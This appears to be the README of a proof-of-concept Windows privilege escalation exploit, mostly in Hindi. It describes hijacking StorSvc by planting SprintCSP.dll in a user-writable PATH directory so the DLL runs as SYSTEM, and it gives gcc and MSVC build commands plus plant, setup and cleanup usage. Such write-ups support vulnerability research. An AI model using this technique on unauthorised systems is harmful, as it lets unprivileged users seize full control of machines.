
Windows privilege escalation exploit जो StorSvc को hijack करने और SYSTEM के रूप में execute करने के लिए उपयोगकर्ता-लिखने योग्य HKLM PATH directory में SprintCSP.dll plant करता है।
StorSvc SprintCSP.dll को SYSTEM के रूप में सापेक्ष नाम से लोड करता है। इसे उपयोगकर्ता-लेखन-योग्य HKLM PATH निर्देशिका में रखें, SYSTEM प्राप्त करें।
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path में उपयोगकर्ता-लेखन-योग्य निर्देशिका की आवश्यकता होती है।
स्वच्छ इमेज पर कोई नहीं। टूलिंग इंस्टॉलर उन्हें जोड़ते हैं (%USERPROFILE%\.cargo\bin, .local\bin, Python Scripts)। यदि बॉक्स में कोई नहीं है, तो CVE-2026-69328.exe --setup एक बनाता है, जिसमें एक बार का एडमिन प्रॉम्प्ट लगता है। एक्सप्लॉइट को स्वयं कभी एडमिन की आवश्यकता नहीं होती।
GCC:
gcc payload.c -shared -o SprintCSP.dll
gcc CVE-2026-69328.c -lrpcrt4 -ladvapi32 -lshell32 -o CVE-2026-69328.exe
MSVC:
cl /LD payload.c /Fe:SprintCSP.dll
cl CVE-2026-69328.c rpcrt4.lib advapi32.lib shell32.lib /Fe:CVE-2026-69328.exe
CVE-2026-69328.exe plant, trigger, read proof
CVE-2026-69328.exe --cleanup remove proof file + planted DLL
प्रमाण C:\Windows\System32\CVE-2026-69328.txt पर पहुँचता है।
लोड के बाद StorSvc क्रैश हो जाता है और SCM इसे ~120s बाद पुनः आरंभ करता है।